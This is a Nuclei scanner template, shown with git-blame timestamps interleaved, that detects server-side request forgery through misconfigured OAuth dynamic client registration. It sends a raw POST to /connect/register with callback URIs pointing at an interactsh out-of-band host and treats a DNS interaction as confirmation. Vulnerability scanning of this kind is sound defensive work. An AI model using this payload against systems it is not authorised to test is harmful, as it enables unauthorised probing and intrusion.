2023-03-31 11:42:54 +00:00
|
|
|
id: ssrf-via-oauth-misconfig
|
2023-03-31 11:34:14 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: SSRF due to misconfiguration in OAuth
|
|
|
|
author: KabirSuda
|
|
|
|
severity: medium
|
|
|
|
description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters.
|
|
|
|
reference:
|
|
|
|
- https://portswigger.net/research/hidden-oauth-attack-vectors
|
|
|
|
tags: misconfig,oast,oauth,ssrf
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-03-31 11:34:14 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2023-03-31 11:34:14 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /connect/register HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/json
|
|
|
|
Accept-Language: en-US,en;q=0.9
|
|
|
|
|
|
|
|
{
|
|
|
|
"application_type": "web",
|
|
|
|
"redirect_uris": ["https://{{interactsh-url}}/callback"],
|
|
|
|
"client_name": "{{Hostname}}",
|
|
|
|
"logo_uri": "https://{{interactsh-url}}/favicon.ico",
|
|
|
|
"subject_type": "pairwise",
|
|
|
|
"token_endpoint_auth_method": "client_secret_basic",
|
|
|
|
"request_uris": ["https://{{interactsh-url}}"]
|
|
|
|
}
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: interactsh_protocol # Confirms the DNS Interaction
|
|
|
|
words:
|
2023-03-31 11:42:54 +00:00
|
|
|
- "dns"
|